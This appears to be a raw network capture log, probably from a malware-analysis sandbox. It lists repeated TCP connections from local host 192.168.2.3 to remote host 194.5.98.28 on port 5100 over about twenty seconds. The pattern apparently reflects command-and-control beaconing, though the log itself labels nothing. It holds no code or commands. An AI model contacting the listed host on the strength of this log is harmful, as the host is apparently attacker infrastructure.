Jan 13, 2022 15:32:31.819716930 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.819756985 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.819760084 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.819808960 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.826261997 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.826350927 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.828627110 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.828700066 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:35.831790924 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:36.048177958 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:36.048299074 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:36.058952093 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:36.326997042 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:36.327306032 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:36.351274967 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:36.403312922 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:36.608786106 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:36.608860970 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:36.826014042 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:36.826105118 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.114264965 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.114397049 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.404872894 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.405019045 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.405905008 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.405988932 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.406008005 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.406049013 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.406053066 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.406116009 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.620939970 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.621004105 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.621085882 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.621782064 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.621876955 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.621949911 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.621975899 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.621995926 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.622019053 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.622023106 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.622143030 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.622203112 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.622354031 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.622431040 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.838335991 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.838393927 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.838474989 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.838946104 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.838989019 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.839067936 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.839272022 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.839323044 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.839380980 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.839422941 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.839478970 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.839653015 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.840244055 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.840281963 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.840321064 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.840321064 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.840336084 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.840358973 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.840370893 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.840616941 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.840656996 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.840681076 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.840699911 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.840806007 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.840847015 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:37.840912104 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:37.935435057 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.059645891 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.059685946 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.059709072 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.059761047 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.059969902 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.059998035 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.060024977 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.060048103 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.060065031 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.060105085 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.060398102 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.060425997 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.060466051 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.060676098 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.060705900 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.060729027 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.060767889 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.061363935 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.061393023 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.061414003 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.061419010 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.061436892 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.061455965 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.061458111 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.061476946 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.061480999 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.061505079 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.061521053 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.061700106 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.061732054 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.061773062 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.063312054 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.063344955 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.063359976 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.063380957 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.063497066 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.063523054 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.063538074 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.063546896 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.063565016 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.063570023 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.063589096 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.063592911 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.063615084 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.063616037 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.063657045 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.067961931 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.067992926 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.068069935 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.068136930 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.068214893 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.068238020 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.068255901 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.068322897 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.068356037 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.068453074 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.068555117 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:38.068645954 CET	5100	49745	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:38.068691969 CET	49745	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:42.012641907 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:42.229043961 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:42.229841948 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:42.241002083 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:42.500921011 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:42.501158953 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:42.779891968 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:42.783798933 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:43.002604008 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:43.005470991 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:43.282321930 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:43.282406092 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:43.557593107 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:43.557686090 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:43.610057116 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:43.610260963 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:43.610527039 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:43.610547066 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:43.610564947 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:43.610584021 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:43.610595942 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:43.610615015 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:43.827972889 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:43.828031063 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:43.828073025 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:43.828113079 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:43.830559015 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:43.830599070 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:43.830632925 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:43.830646038 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:43.830692053 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:43.830746889 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:43.830852032 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:43.831001997 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:43.831151009 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:43.831463099 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:43.831513882 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:43.831578016 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.051826954 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.051855087 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.051948071 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.051973104 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.051999092 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.052051067 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.052341938 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.052433968 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.058796883 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.058815956 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.058830976 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.058846951 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.058864117 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.058892012 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.058906078 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.058942080 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.059015989 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.059060097 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.060262918 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.060281992 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.060317039 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.060363054 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.060384035 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.060393095 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.060908079 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.060925961 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.060940981 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.060965061 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.061079979 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.123153925 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.268526077 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.268593073 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.268636942 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.268666029 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.268678904 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.268733025 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.268742085 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.268747091 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.269081116 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.269121885 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.269165039 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.269179106 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.269191027 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.269206047 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.269253969 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.269263983 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.275252104 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.275305986 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.275408030 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.275432110 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.276074886 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.276115894 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.276155949 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.276205063 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.276226044 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.276233912 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.276801109 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.276845932 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.276917934 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.276932001 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.276969910 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.277232885 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.277270079 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.277297974 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.277306080 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.277311087 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.277391911 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.277410030 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.277667999 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.277709961 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.277780056 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.277798891 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.277976990 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.278013945 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.278053999 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.278088093 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.278105974 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.278115034 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.278453112 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.278496027 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.278525114 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.278592110 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.278687954 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.278990030 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.279020071 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.279125929 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.279161930 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.279397964 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.279428005 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.279450893 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.279455900 CET	5100	49748	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:44.279469967 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.279496908 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:44.279508114 CET	49748	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:48.409563065 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:48.625222921 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:48.625484943 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:48.874521017 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:49.107295990 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:49.107420921 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:49.389719009 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:49.389839888 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:49.608738899 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:49.608850002 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:49.873586893 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:49.873656034 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.139497995 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.139594078 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.153878927 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.153932095 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.154051065 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.154073954 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.154112101 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.154148102 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.154663086 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.154742002 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.370887995 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.370950937 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.370984077 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.371016979 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.371289968 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.371345043 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.371436119 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.371491909 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.371635914 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.371684074 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.371833086 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.371871948 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.371879101 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.371974945 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.372064114 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.372261047 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.589670897 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.589698076 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.589718103 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.589739084 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.589760065 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.589781046 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.589781046 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.589802980 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.589823961 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.589824915 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.589860916 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.589860916 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.589883089 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.589888096 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.589905024 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.589909077 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.589929104 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.589931965 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.589950085 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.589952946 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.589971066 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.589986086 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.590018988 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.590075016 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.590213060 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.590280056 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.590321064 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.733156919 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.809653044 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.809767008 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.810107946 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.810137033 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.810221910 CET	49749	5100	192.168.2.3	194.5.98.28
